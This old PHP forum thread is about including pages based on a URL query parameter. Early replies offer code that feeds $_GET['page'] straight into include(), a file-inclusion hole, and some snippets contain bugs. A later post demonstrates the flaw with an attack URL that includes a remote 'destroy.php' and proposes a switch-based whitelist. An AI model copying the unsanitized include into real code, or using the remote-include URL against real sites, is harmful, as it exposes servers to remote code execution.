Jump to content


Photo

include file from url query


  • Please log in to reply
8 replies to this topic

#1 mccabre1

mccabre1
  • Members
  • Pip
  • Newbie
  • 3 posts
  • LocationLondon

Posted 16 February 2006 - 05:03 PM

Hi, I'm trying to include files in my 'index.php' page based on the url. My menu links to:

index.php?page=home
index.php?page=news
index.php?page=contact

then I want to include the content based on that url, so if it reads 'index.php?page=home' it will load 'home.php'.

I currently have this line of code to call the file:
<? include ("$page.php"); ?>

Now, when I load my page it can't find the file and doesn't recognise the 'page=' bit of the url.

Can anyone tell me what I'm doing wrong??

Thanks.
C

#2 Darkness Soul

Darkness Soul
  • Members
  • PipPipPip
  • Advanced Member
  • 133 posts
  • LocationBrazil; São Paulo.

Posted 16 February 2006 - 05:26 PM

May it works, i don't test ;)

<?php
   $page = $_GET['page'];
   include $page;
?>

^~ if works, tell me, if wont, tell me too, so then i will test here and get the code..

bye
(If something is wrong, please tell me. I'm learning this language. Thank you)

#3 mccabre1

mccabre1
  • Members
  • Pip
  • Newbie
  • 3 posts
  • LocationLondon

Posted 16 February 2006 - 05:33 PM

[!--quoteo(post=346437:date=Feb 16 2006, 05:26 PM:name=Darkness Soul)--][div class=\'quotetop\']QUOTE(Darkness Soul @ Feb 16 2006, 05:26 PM) View Post[/div][div class=\'quotemain\'][!--quotec--]
May it works, i don't test ;)

<?php
   $page = $_GET['page'];
   include $page;
?>

^~ if works, tell me, if wont, tell me too, so then i will test here and get the code..

bye
[/quote]

Yes! That's fantastic, thanks very much! I wrote the code out as follows:

<?
$page = $_GET['$page'];
include ("$page.php");
?>

- '.php' is the file extension on my includes.

Thanks again,
Chris

#4 mccabre1

mccabre1
  • Members
  • Pip
  • Newbie
  • 3 posts
  • LocationLondon

Posted 17 February 2006 - 09:27 AM

Also, when using the $page on many different things - such as specifying the page 'title', just put the following above your doctype:

<? $page = $_GET['page']; ?>

Thanks again!

Chris

#5 Darkness Soul

Darkness Soul
  • Members
  • PipPipPip
  • Advanced Member
  • 133 posts
  • LocationBrazil; São Paulo.

Posted 17 February 2006 - 11:46 AM

Yep, that's the cool side of the for.. code!

You aways can use it for all pages with one code.. something like..

<?php

   // Before headers
   $page = $_GET [ '$page' ];

   // Now, test the URL query for security {thanks another topic}
   if ( !is_file ( "$page.php" ) && $page != "" )
   {
      // File not found!!!
      header ( "location: index.php" );
   }
   // Are you in index?
   elseif ( $page == "" )
   {
      $page = "home";
   }

   // Inside <title></title> tags
   print "You are in ". $page";

   // Calling the specific page
   include ( "$page.php" );

   // (...)
?>

=)
(If something is wrong, please tell me. I'm learning this language. Thank you)

#6 dude753

dude753
  • Members
  • PipPip
  • Member
  • 11 posts

Posted 20 February 2006 - 07:56 PM

Howdy,

I found this code on a search. I used it and it worked. I just changed the "s to 's and it stopped working. I was just wondering why?

It causes no problem I'll just use "s instead.

include ("$page.php");


#7 Darkness Soul

Darkness Soul
  • Members
  • PipPipPip
  • Advanced Member
  • 133 posts
  • LocationBrazil; São Paulo.

Posted 21 February 2006 - 12:23 PM

If am I wrong, please tell me.. but, i think..

When you use " ", the PHP allow you to write variables inside, when you use ' ', you are not allowed to.

Like your include, test both of these:
// may work
require ( "$page.php" );
require ( $page .'.php' );

// may not work
require ( '$page' . '.php' );
require ( '$page.php' );
=)
(If something is wrong, please tell me. I'm learning this language. Thank you)

#8 heckenschutze

heckenschutze
  • Members
  • PipPipPip
  • Advanced Member
  • 257 posts
  • LocationAustralia

Posted 21 February 2006 - 01:28 PM

One very large problem with the code mentioned, is remote script execution is possible.

Eg if I made a script on my site that destroyed everything if run, I could tell your script to run/include it.

The following would work:

index.php?page=http://mysite.com/destroy[!--coloro:#CCCCCC--][span style=\"color:#CCCCCC\"][!--/coloro--].php[!--colorc--][/span][!--/colorc--]

Therefore, causing destroy.php to be included into your page, as if it was a file on your site.

A common work around is to use switches:
<?php

switch($_GET["page"])
{
    case "page1";
        $page = "page1.php";
        $title = "My page title.php";
    break;
    
    default:
        $page = "main.php";
        $title = "Home";
    break;
}

include $page;

?>

hth someone.

#9 dude753

dude753
  • Members
  • PipPip
  • Member
  • 11 posts

Posted 26 February 2006 - 10:54 AM

[!--quoteo(post=347945:date=Feb 21 2006, 01:28 PM:name=heckenschutze)--][div class=\'quotetop\']QUOTE(heckenschutze @ Feb 21 2006, 01:28 PM) View Post[/div][div class=\'quotemain\'][!--quotec--]
One very large problem with the code mentioned, is remote script execution is possible.

Eg if I made a script on my site that destroyed everything if run, I could tell your script to run/include it.

The following would work:

index.php?page=http://mysite.com/destroy[!--coloro:#CCCCCC--][span style=\"color:#CCCCCC\"][!--/coloro--].php[!--colorc--][/span][!--/colorc--]

Therefore, causing destroy.php to be included into your page, as if it was a file on your site.

A common work around is to use switches:
<?php

switch($_GET["page"])
{
    case "page1";
        $page = "page1.php";
        $title = "My page title.php";
    break;
    
    default:
        $page = "main.php";
        $title = "Home";
    break;
}

include $page;

?>

hth someone.
[/quote]
Could I also stick my site URL infront of the $page value? So that if someone tried to put their own URL in it would be [a href=\"http://mydomain.com/index.php?page=http://theirsite.com/destroy\" target=\"_blank\"]http://mydomain.com/index.php?page=http://...ite.com/destroy[/a]

Then $page would equal [a href=\"http://mydomain.com/http://theirsite.com/destroy\" target=\"_blank\"]http://mydomain.com/http://theirsite.com/destroy[/a] and this would give a 404.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users